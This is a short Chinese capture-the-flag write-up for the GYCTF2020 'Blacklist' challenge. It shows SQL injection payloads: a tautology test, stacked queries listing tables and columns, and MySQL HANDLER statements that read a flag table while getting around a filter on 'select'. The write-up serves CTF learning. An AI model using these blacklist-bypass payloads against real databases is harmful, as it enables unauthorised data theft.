[GYCTF2020]Blacklist-1|SQL注入|堆叠注入

1、打开之后确定是否存在注入点，构造闭合的sql语句，payload：1' or '1'='1，结果如下：

2、尝试进行联合注入获取列数和可以回显的信息，但是发现select被过滤，结果如下：

3、联合查询行不通那就尝试下堆叠注入，payload：1';show tables;，获取表的名称，结果如下：

4、获取到表明之后，通过payload：1';show columns from FlagHere;#，获取到列明信息，结果如下：

5、获取到列明信息后通过handler语句来获取flag值（这里在网上查找的，还是缺少积累，都不了解handler），payload：1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#，结果如下：

handler参考文章：https://blog.csdn.net/jesseyoung/article/details/40785137

---

如果您觉得阅读本文对您有帮助，请点一下“推荐”按钮，您的“推荐”将是我最大的写作动力！欢迎各位转载，但是未经作者本人同意，转载文章之后必须在文章页面明显位置给出作者和原文连接，否则保留追究法律责任的权利。